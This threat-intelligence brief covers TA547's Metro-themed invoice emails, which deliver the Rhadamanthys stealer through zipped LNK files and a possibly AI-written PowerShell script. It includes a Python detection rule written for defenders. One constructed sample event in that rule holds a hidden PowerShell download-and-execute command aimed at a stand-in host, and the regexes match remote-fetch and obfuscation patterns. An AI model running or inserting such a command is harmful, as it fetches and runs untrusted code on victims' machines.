2024-04-18

Signs of AI In PowerShell Script Distributing Rhadamanthys Stealer

Level: Tactical | Source: Proofpoint | Global


Analysis of a PowerShell script has revealed the possible use of AI in its creation, according to researchers at Proofpoint, who attribute the activity to the initial access broker TA547 (aka Scully Spider). The group launched an email campaign targeting German organizations to deliver the Rhadamanthys information stealer, marking another expansion of TA547's toolset. The emails impersonate communications from the established retail company Metro and use fabricated invoices to lure victims. Proofpoint's researchers also identified TA547 activity spanning the United States, Austria, Spain, and Switzerland.

The attack unfolds when an unsuspecting recipient opens an LNK file concealed within a seemingly benign zip archive; the LNK launches PowerShell, which retrieves and runs a remote script. That script's clean, articulate comments suggest AI was involved in generating it. Proofpoint notes, "Specifically, the PowerShell script included a pound sign followed by grammatically correct and hyper specific comments above each component of the script. This is a typical output of LLM-generated coding content, and suggests TA547 used some type of LLM-enabled tool to write (or rewrite) the PowerShell, or copied the script from another source that had used it." TA547, a financially motivated initial access broker, is known for geographically diverse targeting and shifting delivery mechanisms, now favoring compressed LNK files over the JavaScript attachments it used previously.
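The zip-to-LNK-to-PowerShell-to-remote-script chain above is the part of this campaign that shows up in endpoint telemetry. The following is an added detection example (not from Proofpoint or Anvilogic) that flags process-creation events where PowerShell is parented by explorer.exe, the usual signature of a double-clicked LNK, and its command line fetches something remote; the Sysmon-style field names, the sample events and the explorer.exe-parent assumption are constructed for illustration.

```python
"""Flag process-creation events matching a zip -> LNK -> PowerShell -> remote
script chain. Sample records are constructed, not real telemetry; the assumption
that a double-clicked LNK surfaces as explorer.exe parenting powershell.exe is ours."""
import re

# Constructed Sysmon-style Event ID 1 records (image, parent image, command line).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"pid": 5310, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -c \"iex (New-Object Net.WebClient)"
                ".DownloadString('https://remote.example.invalid/s.ps1')\""},
    {"pid": 5322, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -File C:\\Users\\u\\scripts\\backup.ps1"},  # benign admin use
    {"pid": 5400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\svchost.exe", "cmdline": "powershell.exe -c Get-Service"},
]

POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.IGNORECASE)
USER_SHELL_PARENT = re.compile(r"\\explorer\.exe$", re.IGNORECASE)
REMOTE_FETCH = re.compile(
    r"(https?://\S+|downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b)",
    re.IGNORECASE)
OBFUSCATION = re.compile(r"-(e|ec|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden", re.IGNORECASE)


def score_event(ev):
    """Return the indicator names matched by one event; an empty list means not flagged."""
    if not POWERSHELL.search(ev["image"]):
        return []
    hits = []
    if USER_SHELL_PARENT.search(ev["parent"]):
        hits.append("powershell_from_explorer")   # consistent with a double-clicked LNK
    if REMOTE_FETCH.search(ev["cmdline"]):
        hits.append("remote_script_fetch")
    if OBFUSCATION.search(ev["cmdline"]):
        hits.append("hidden_or_encoded")
    # Require both the parent relationship and a remote fetch to avoid paging on
    # locally run admin scripts; the hidden/encoded flag only adds context.
    if "powershell_from_explorer" in hits and "remote_script_fetch" in hits:
        return hits
    return []


def flag_events(events):
    """Return (pid, indicators) for every event the rule fires on."""
    return [(ev["pid"], score_event(ev)) for ev in events if score_event(ev)]
```

Running `flag_events(SAMPLE_EVENTS)` fires only on pid 5310; the locally executed backup script from explorer.exe and the svchost-parented query are left alone.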

Proofpoint's findings reinforce the continued evolution of cybercriminal tactics, which may now incorporate AI-generated scripts into complex attack chains. Using AI to write the script does not fundamentally change the malware's function or threat level, but it does signal the adversaries' growing sophistication. Proofpoint's detection insights also cover another initial access broker, TA577, noting the group's attempts to capture NTLM authentication hashes in February 2024 and its engagement in post-compromise operations beyond the traditional IAB role.
